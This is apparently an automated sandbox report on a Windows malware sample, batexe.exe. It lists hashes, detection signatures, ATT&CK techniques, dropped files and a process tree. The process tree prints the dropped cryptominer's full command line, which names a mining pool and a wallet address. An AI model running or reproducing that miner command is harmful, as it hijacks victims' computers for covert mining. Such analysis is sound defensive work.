73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18-02-2024 17:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2716	b2e.exe
5448	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5448	cpuminer-sse2.exe
5448	cpuminer-sse2.exe
5448	cpuminer-sse2.exe
5448	cpuminer-sse2.exe
5448	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5472-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5472 wrote to memory of 2716	5472	batexe.exe	85
PID 5472 wrote to memory of 2716	5472	batexe.exe	85
PID 5472 wrote to memory of 2716	5472	batexe.exe	85
PID 2716 wrote to memory of 1768	2716	b2e.exe	86
PID 2716 wrote to memory of 1768	2716	b2e.exe	86
PID 2716 wrote to memory of 1768	2716	b2e.exe	86
PID 1768 wrote to memory of 5448	1768	cmd.exe	89
PID 1768 wrote to memory of 5448	1768	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5472
- C:\Users\Admin\AppData\Local\Temp\3C29.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\3C29.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\3C29.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\46B8.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1768
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5448

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3C29.tmp\b2e.exe

Filesize
5.1MB

MD5
14d6603ccea4512201baa42f76e6b7d0

SHA1
46e75ad8cdff2cf9b9519f3579098fa621327a5d

SHA256
0720cd450d8034a4a41e80bd04266f0263328f4e1166c011a186a15af7c2db22

SHA512
2535b239b992cc6044d2a6c41c3e0234cda59a4457306621b2e2b8bc3a8210e3924fed93e0ffab32b0f91f2ededbce93f7b2a4bf361c1312e8c378278bcee3fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\3C29.tmp\b2e.exe

Filesize
960KB

MD5
d15ecf39e70d4d6e278b0da9ff36ba87

SHA1
2139694bf96cc3b6fbfadb8a9c8745b8901bff6a

SHA256
04b2e6191d36dccb7b93c7d207ff16c0702cdec9b64b98206f9ffc7dc7633d54

SHA512
326cdd9b35aa3dbd39d2fd4a22dd78f732d481f05ef6dca085cd086d8ca91502f3be961b44e5c4bbf2ebf947ffc4f1b4d4703593951fce22acaa418a77741434

Download Submit
C:\Users\Admin\AppData\Local\Temp\3C29.tmp\b2e.exe

Filesize
1.6MB

MD5
aecf193f8c59fcb5094ba07a321ce683

SHA1
deb18a73a0935f7b7ab23cf5c5465d2572ce5d66

SHA256
e63bcae652d2d9f16ca01d06a93127fa1ed3cb836346caf881eefda7bd7b7dc8

SHA512
330f1bdf44d9e931561111453be67a539ff00ad2f7219f87c2acf7fe4d502187925201591117621326f01167f6b09c6a042d1f0206c41dbec7bde2cab15abb8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\46B8.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
547KB

MD5
dfa06e52c250d5de452926e8ad288700

SHA1
703b6f3026756659d93f6635b2cad532a77daedf

SHA256
14fd16604b6aa34ab554e76cc6626196fae61e036f2fe91d69b2d8bb2e035fd0

SHA512
233daed431bcd044f7b66e059e5910f26e1660e135a2b1008a7e877d6629e81e3a574c38953eaca4c9328b4916bd7a04fbe7c599dac6e9de2fd193793d5687ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
326KB

MD5
7f5137554b3c14a787a876436fa01b9f

SHA1
01081db6f949d9c212276b3f6cac1eb705f96fca

SHA256
6c90bdac09967d99e4ba88f6516a80a3da6983864c90d19d1433b424f556a7d8

SHA512
5668f5effb896f483f15de7a6f6c61f1e963f0482b8416e2a90dcc398e25a2c9bcf3cd6c2e4927810f1bd3c5536d0971039f2958776b9bf9bbef104e1bc43f21

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
398KB

MD5
94fce06a40d296bce31ea609b3ef23d3

SHA1
40929e5b7a9d39c053c7771c7255e4b0c63db86b

SHA256
4007454b22bb860099d4928d5121f17888e319138ea9c1c9fe7fcb6688f69ae0

SHA512
054c674b1a9e48e9cf575f208146e240ca2c7c7170f560fd2d37354771871a11cad813ddc43ba15ac0607cfa9d6f9f6bdd995db69a90cd0bff97ff09e016e2ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
214KB

MD5
b9d8052b5da07ea3f5243dbdbc37bff3

SHA1
b6f60b5a1c0b78e5328d6c76421925a5388cae2a

SHA256
0753a923bc4b6bbb2a1d1e49ff86e5d4075b8cff86d77302d1021a393c6076b4

SHA512
4bf9c34195a79b91ca0d604f6519c47a07cf0c1d6061315d26da9b150bea61d181722c24f6ca3e909584e0e18dd9b12c624c69ecf1578d0d4f43746fbcab3f51

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
352KB

MD5
52585fcba29cd7b167abe410f5bf6e1b

SHA1
d1104305ad63c1b98734aae336ca91d53ebfce3e

SHA256
94ea18b8526fc442c97eb97ddeea36ee6c90b45a0e3eae7499cd563d401214f4

SHA512
eb8f8726ae803bec282ea1cff6ab2eeff57ccbc168b47330552339a6a15c147408f2dce7c79e6963dc7f4817a44b2a6939b3e2526d057cd4a01bc667a2151571

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
128KB

MD5
48c422e815911804d8322f84e605438f

SHA1
b577cb4575fdf07ead63d0f9831833f4f30788e9

SHA256
3247538f008c10c405b77c7a1ff636bd7f7e72b0cf4b5990870c157958b4e6ea

SHA512
0278d1c8a8bb02bb70bac382c89481451ddd147f2b195fed3cf1105524358a04703be54186e138d0e1f1423441e694cd292eb890cfe66bc421eb160821548f8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
192KB

MD5
62069650d62f76a4cdf0e81172d99993

SHA1
3b20ec5b4a4320ee15b0f7b9715a9ab90f68346e

SHA256
779a5590c667d9a704b79e159259c0646737394fd66a9c0b12d13f9445ca091c

SHA512
ae1954a84fb7543465e77a4cd5cc1bdeee0cf848592958633e6c51702b42131daae64c302d5c9537c59a9b3ba9498e5bf913d1f6f757ccdb8c4183b33224852b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.4MB

MD5
4577a00bccf4d4ef0d3cc6ec49b92274

SHA1
86945cc56108d5a61681aa4510b32b1a70f4d945

SHA256
0021f30634d880fddf925e52c3921a677817f6da2ab429f41966cdb1c1656feb

SHA512
79242027abd0d150d9bf070dbd9c6b334beccac5fbf37cbdc2a9ee1a621ed92cb3b71941f4876b64d54d784c69bfbea793935ad137f86009f47209b51863947a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.6MB

MD5
e4743dfe4584ba94ebffeaf9c472a1a4

SHA1
ac637845b6e96f421f6f910ff84f3233adb9b185

SHA256
1975227034a1479c22f50c41abdf49ea3627a1301b5619db3763e2aa89c5b885

SHA512
e38343969b1bfd5a1c2956164a2bc89d3424290518993becf3b9d3f82b8ef1c5cf178a1ddf8c7dabc07388b67ce953d6ec6c05ad68d850e4e8e050ddf3847aab

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
192KB

MD5
625f906456510afaf916dd0384d76eee

SHA1
66c56574aff02fb199caa60ab71ca9f1c9e7fc92

SHA256
27baaef233592b03722c7d64c26d2270c0300ffb8e7f08a8e0d65212af4b848d

SHA512
041399c5ddc614d8b1a359238df8fb09258c95a0013e5139dbf4093b892395f5f78fa31fbecfee92966c5e78a5c5894005c98e559b8b5735ecf9c1995df51b17

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
128KB

MD5
8d949f4e279a9a80f50d7c2e0c7bff36

SHA1
92e29300716211895b2d8cd4cf010452f0132152

SHA256
2e87614d15e62262c8b0a0c65e302b15e971b591469f3c679e7e516934cf621f

SHA512
36565dc0a3290ac8c5e0fd0a2756764ce8e49a7ef52a437caad549c7ea1ac3ac7dfe05cd4951ed6b17051768fd9733c94365d85832092c429b0b74ab62a338fb

Download Submit
memory/2716-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2716-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5448-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/5448-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5448-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5448-45-0x0000000065FD0000-0x0000000066068000-memory.dmp

Filesize
608KB

Download
memory/5448-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5448-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5448-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5448-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5448-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5448-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5448-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5448-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5448-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5448-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5472-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download